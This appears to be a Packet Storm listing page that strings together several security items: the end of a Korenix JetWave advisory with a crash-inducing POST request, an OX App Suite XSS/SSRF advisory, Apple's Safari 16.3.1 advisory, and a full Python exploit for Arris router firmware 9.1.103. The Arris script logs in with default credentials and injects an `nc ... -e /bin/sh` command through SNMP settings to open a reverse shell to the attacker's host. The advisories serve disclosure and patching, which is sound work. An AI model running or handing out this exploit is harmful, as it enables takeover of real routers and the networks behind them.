is created.Command output is written into /tmp/syscmd.2) Authenticated Denial of Web-ServiceThe process goahead chrashes when the following POST request is sent to theendpoint /goform/formDefault:===============================================================================POST /goform/formDefault HTTP/1.1Host: 172.16.0.38User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 62Origin: http://172.16.0.38Connection: closeReferer: http://172.16.0.38/toolping.aspCookie: -common-web-session-=::webs.session::3c624961199904f380e978a3967cc356Upgrade-Insecure-Requests: 1PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping=============================================================================== The output was observed on the terminal using our emulated instance:=============================================================================== rm: invalid option -- /BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binaryUsage: rm [OPTION]... FILE...Remove (unlink) the FILE(s).  You may use '--' toindicate that all following arguments are non-options.Options:     -i        always prompt before removing each destination     -f        remove existing destinations, never prompt     -r or -R    remove the contents of directories recursivelykillall: wlwatchdog: no process killedkillall: wlapwatchdog: no process killed=============================================================================== The vulnerabilities were manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution-------------------------------------------------------------------------------Owner of these products are suggested to update to the following versions:  * Korenix JetWave 4221 HP-E V1.4.0  * Korenix JetWave 2212G V1.10  * Korenix JetWave 2212X/2112S V1.11  * Korenix JetWave 2211C V1.6  * Korenix JetWave 2411/2111 V1.5  * Korenix JetWave 2411L/2111L V1.6  * Korenix JetWave 2414/2114 V1.4  * Korenix JetWave 2424 V1.3  * Korenix JetWave 2460 V1.6  * Korenix JetWave 3220/3420 V3 V1.7Recommendation-------------------------------------------------------------------------------CyberDanube recommends customers from Korenix to upgrade the firmware to thelatest version available. Furthermore, a full security review by professionalsis recommended.Contact Timeline-------------------------------------------------------------------------------2022-12-05: Contacting Beijer Electronics Group via cs@beijerelectronics.com2022-12-12: Meeting with Beijer Electronics. Vulnerabilities were confirmed by             the vendor. The vendor planned to fix the vulnerabilities in the             next 1.5 months.2023-01-04: Contact shared the updated firmware version. CyberDanube checked             if the vulnerabilities got fixed. The contact communicated that             not only JetWave4221 is vulnerable to these issues. Therefore,             CyberDanube postponed the release of the Advisory until the other             products have been patched.2023-01-30: Meeting with Beijer Electronics. Customer get informed about the             issues. Fixes got published. Disclosure date got shifted to             2023-02-13 to provide a time-window for patching.2023-02-13: Coordinated release of security advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF S. Dietz, T. Weber / @2023

Korenix JetWave Command Injection / Denial Of Service

OX App Suite suffers from cross site scripting and server-side request forgery vulnerabilities.

Internal reference: OXUIB-1795  
Vulnerability type: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS))  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite backend 7.10.5-rev50, OX App Suite backend 7.10.6-rev29  
First fixed revision: OX App Suite backend 7.10.5-rev51, OX App Suite backend 7.10.6-rev30  
Discovery date: 2022-07-29  
Solution date: 2022-10-21  
Disclosure date: 2023-02-08  
CVE: CVE-2022-37306  
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Details:  
XSS using "upsell" triggers. Non-alphanumeric content can be injected by the user as JS content for the "upsell" module. As a result, the code will be executed during subsequent logins and opening the "Portal" application, enabling a persistent cross-site scripting attack vector.

Risk:  
Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require temporary access to the users account or lure a user to a compromised account. No publicly available exploits are known.

Solution:  
We improved the allow-list sanitizing algorithm to deal with non-alphanumeric code.

---

Internal reference: OXUIB-1933  
Vulnerability type: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS))  
Component: frontend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite frontend 7.10.5-rev38, OX App Suite frontend 7.10.6-rev19  
First fixed revision: OX App Suite frontend 7.10.5-rev39, OX App Suite frontend 7.10.6-rev20  
Discovery date: 2022-09-26  
Solution date: 2022-10-21  
Disclosure date: 2023-02-08  
CVE: CVE-2022-43696  
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Details:  
XSS using "upsell ads". HTML content can be injected by the user as JS content for the "upsell ads" module. As a result, the code will be executed during subsequent logins and opening the "Portal" application, enabling a persistent cross-site scripting attack vector.

Risk:  
Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require temporary access to the users account or lure a user to a compromised account. No publicly available exploits are known.

Solution:  
We improved the sanitization process for upsell ads.

---

Internal reference: MWB-1784  
Vulnerability type: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS))  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite backend 7.10.5-rev50, OX App Suite backend 7.10.6-rev29  
First fixed revision: OX App Suite backend 7.10.5-rev51, OX App Suite backend 7.10.6-rev30  
Discovery date: 2022-08-16  
Solution date: 2022-10-25  
Disclosure date: 2023-02-08  
CVE: CVE-2022-43697  
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Details:  
"Tracking" features can be used to inject arbitrary script code. In case activity tracking adapters are enabled but not defined, users can use jslob to define own tracking settings for an account. This allows adding arbitrary values to trigger a specific URL or load a library.

Risk:  
Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require temporary access to the users account or lure a user to a compromised account. No publicly available exploits are known.

Solution:  
We made the related jslob configuration endpoint read-only for users.

---

Internal reference: MWB-1823  
Vulnerability type: CWE-918 (Server-Side Request Forgery (SSRF))  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite backend 7.10.5-rev50, OX App Suite backend 7.10.6-rev29  
First fixed revision: OX App Suite backend 7.10.5-rev51, OX App Suite backend 7.10.6-rev30  
Discovery date: 2022-09-14  
Solution date: 2022-10-24  
Disclosure date: 2023-02-08  
CVE: CVE-2022-43698  
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Details:  
SSRF using POP3 account updates. When changing a valid external POP3 mail account as a user, the operation to update the accounts settings did not consider deny-list values.

Risk:  
Server-initiated requests can be directed to internal resources that are restricted based on deny-list settings. This can be used to determine "internal" addresses and services, depending on measurement and content of error responses. While no data of such services can be exfiltrated, the risk is a violation of perimeter based security policies. No publicly available exploits are known.

Solution:  
We now check compliance with existing deny-list content when updating POP3 mail accounts.

---

Internal reference: MWB-1862  
Vulnerability type: CWE-918 (Server-Side Request Forgery (SSRF))  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite backend 7.10.5-rev50, OX App Suite backend 7.10.6-rev29  
First fixed revision: OX App Suite backend 7.10.5-rev51, OX App Suite backend 7.10.6-rev30  
Discovery date: 2022-10-06  
Solution date: 2022-11-07  
Disclosure date: 2023-02-08  
CVE: CVE-2022-43699  
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Details:  
Mail account discovery can be abused for SSRF. The external E-Mail autodiscovery feature performs connections checks based on the E-Mail addresses host-part. Those do not take existing deny-lists into respect, allowing attackers with access to DNS records of a domain to redirect requests to illegal addresses.

Risk:  
Server-initiated requests can be directed to internal resources that are restricted based on deny-list settings. This can be used to determine "internal" addresses and services, depending on measurement and content of error responses. While no data of such services can be exfiltrated, the risk is a violation of perimeter based security policies. No publicly available exploits are known.

Solution:  
We check for compliance with existing deny-list content when performing mail account autodiscovery.

---

Internal reference: MWB-1882, DOCS-4580  
Vulnerability type: CWE-94 (Improper Control of Generation of Code ('Code Injection'))  
Component: office  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite backend 7.10.5-rev50, OX App Suite backend 7.10.6-rev29, OX App Suite office 7.10.5-rev10, OX App Suite office 7.10.6-rev5  
First fixed revision: OX App Suite backend 7.10.5-rev51, OX App Suite backend 7.10.6-rev30, OX App Suite office 7.10.5-rev11, OX App Suite office 7.10.6-rev6  
Discovery date: 2022-10-19  
Solution date: 2022-10-21  
Disclosure date: 2023-02-08  
CVE: CVE-2022-42889  
CVSS: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Details:  
Apache Commons Text Update. A critical vulnerability at the Apache Commons Text library has been identified, which is used by OX App Suite and OX Documents. However, our products do not directly use the vulnerable StringSubstitutor class. Based on current knowledge that means our products are not vulnerable.

Risk:  
Remote Code Execution, see CVE-2022-42889. No publicly available exploits are known.

Solution:  
We provided a update for this library to resolve the risk as a precaution, in case custom implementations use the vulnerable class.

OX App Suite Cross Site Scripting / Server-Side Request Forgery

Apple Security Advisory 2023-02-13-3 - Safari 16.3.1 addresses a code execution vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-02-13-3 Safari 16.3.1Safari 16.3.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213638.WebKitAvailable for: macOS Big Sur and macOS MontereyImpact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited.Description: A type confusion issue was addressed with improvedchecks.WebKit Bugzilla: 251944CVE-2023-23529: an anonymous researcherAll information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPq5PMACgkQ4RjMIDkeNxmFTBAA05jcHEZOdXuE0BQKft0qoWItZ2Dg0p/ONxiqS9ihNDqBt+6q+yOORvr4Vr2iVpCpo4F5nQv/qBApGCS84SVN9rRIM1VteOYIObgpo37CceODrbywjSTHcD6GbR47ra8reQK10sDSIoQtX1XKGUltUC/RfKnVDtk/coNu7TJj/VVg2YNPOlQFc5ETie0d/NOcK+8Ds1NvK4HQ0Gfq+KHmE507T7nAMfcK4YVlZCtkz4YHEa9w9AcIgmQ4nzlOSEs5mHu2egr70Xy8+CL7i82Oh2FBzVetLkDhhrZppjykX7zK4Lc0cbABpiaIu/6ObPGhoW4sFfPCJa8NSflRLKe+aNHdyuzjuqx8rSeqFdP4+rhdI/X2Z/9VKsB/1Tch55nuBhEGZTejmdwtorGf1+otfW5XpWOGXwnE9sR0qjVvwPwfuK5noLUoLvBRfiK6xaKUG6IXEYCt0rVncJJ9QtJJKYvqhbf3OwNodrA/V9AAm2MTtIo514BkfZHtv01xOm7tv35a+5QFcoW/iJBvdTxGVCwzb+2AshMCqO9MQxt8cWknC41K0l6Fl6Yl/P0qzUJr4NoG72LwW0PqaHimWDVAqJcAHsESe/1qnLO3rZItQJByxURc4wUpHAojsFBEBtLiS7FNHOvw4bM1ylQIXXoiFD7sE9NpvksUDzNoRdyAEOM==b0uc-----END PGP SIGNATURE-----

Apple Security Advisory 2023-02-13-3

Arris Router Firmware version 9.1.103 authenticated remote code execution exploit that has been tested against the TG2482A, TG2492, and SBG10 models.

    c# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)# Date: 17/11/2022# Exploit Author: Yerodin Richards# Vendor Homepage: https://www.commscope.com/# Version: 9.1.103# Tested on: TG2482A, TG2492, SBG10# CVE : CVE-2022-45701import requestsimport base64router_host = "http://192.168.0.1"username = "admin"password = "password"lhost = "192.168.0.6"lport = 80def main():    print("Authorizing...")    cookie = get_cookie(gen_header(username, password))    if cookie == '':        print("Failed to authorize")        exit(-1)    print("Generating Payload...")    payload = gen_payload(lhost, lport)    print("Sending Payload...")    send_payload(payload, cookie)    print("Done, check shell..")def gen_header(u, p):    return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")def no_encode_params(params):    return  "&".join("%s=%s" % (k,v) for k,v in params.items())def get_cookie(header):    url = router_host+"/login"    params = no_encode_params({"arg":header, "_n":1})    resp=requests.get(url, params=params)    return resp.content.decode('UTF-8')def set_oid(oid, cookie):    url = router_host+"/snmpSet"    params = no_encode_params({"oid":oid, "_n":1})    cookies = {"credential":cookie}    requests.get(url, params=params, cookies=cookies)def gen_payload(h, p):    return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"def send_payload(payload, cookie):    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)    set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)    if __name__ == '__main__':    main()

Source

Packet Storm